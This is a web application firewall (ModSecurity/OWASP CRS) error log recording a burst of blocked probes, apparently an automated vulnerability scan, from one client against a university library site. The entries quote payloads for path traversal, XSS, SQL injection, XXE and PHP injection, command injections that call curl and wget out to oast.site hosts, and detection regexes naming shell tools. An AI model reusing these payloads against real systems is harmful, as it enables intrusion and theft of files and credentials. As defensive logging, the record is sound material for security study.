[Tue Aug 29 11:41:20.618612 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAc0NdUAAAAM"]
[Tue Aug 29 11:41:21.981749 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26g1abc3htriyc39.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAcqJNgAAAAG"]
[Tue Aug 29 11:41:22.493200 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAUKhE4AAABC"]
[Tue Aug 29 11:41:23.365917 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAYf-RIAAAAD"]
[Tue Aug 29 11:41:24.371491 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAQkBbsAAAAC"]
[Tue Aug 29 11:41:24.392336 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAc4EoAAAAAP"]
[Tue Aug 29 11:41:24.434875 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAQkBb0AAAAC"]
[Tue Aug 29 11:41:25.504154 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAaZ9tEAAAAo"]
[Tue Aug 29 11:41:25.546419 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAaZ9tMAAAAo"]
[Tue Aug 29 11:41:26.380340 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAc2dS8AAAAN"]
[Tue Aug 29 11:41:26.638698 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAc0NgoAAAAM"]
[Tue Aug 29 11:41:26.699009 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc0Ng0AAAAM"]
[Tue Aug 29 11:41:27.636767 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQSWpAAAAA0"]
[Tue Aug 29 11:41:28.423868 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gjo5z8mscsgnsq.oast.site found within TX:1: cjmnbitjmimt14dgn26gjo5z8mscsgnsq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAUKhHAAAABC"]
[Tue Aug 29 11:41:30.383227 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gufp88okqr9tbu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcrikcAAAAB"]
[Tue Aug 29 11:41:30.555679 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAcbSH0AAAAv"]
[Tue Aug 29 11:41:32.353758 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAbo-ZwAAAAi"]
[Tue Aug 29 11:41:32.523970 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAcoNYoAAAAF"]
[Tue Aug 29 11:41:33.472169 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAQSWqYAAAA0"]
[Tue Aug 29 11:41:35.514913 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAQSWq4AAAA0"]
[Tue Aug 29 11:41:36.371099 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAQkBggAAAAC"]
[Tue Aug 29 11:41:36.377843 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAcqJQwAAAAG"]
[Tue Aug 29 11:41:38.368330 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAcbSK8AAAAv"]
[Tue Aug 29 11:41:39.480935 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAQSWr8AAAA0"]
[Tue Aug 29 11:41:40.487346 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAQSWsQAAAA0"]
[Tue Aug 29 11:41:42.401895 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAc92qEAAAAD"]
[Tue Aug 29 11:41:45.388370 2023] [:error] [pid 1858] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gsfscp73874kh3.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdCFisAAAAS"]
[Tue Aug 29 11:41:46.375840 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc0NloAAAAM"]
[Tue Aug 29 11:41:49.397754 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAQSWucAAAA0"]
[Tue Aug 29 11:41:56.384351 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdOeNEAAAAS"]
[Tue Aug 29 11:41:57.479447 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdECYoAAAAW"]
[Tue Aug 29 11:41:58.386865 2023] [:error] [pid 1878] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAdW2YIAAAAb"]
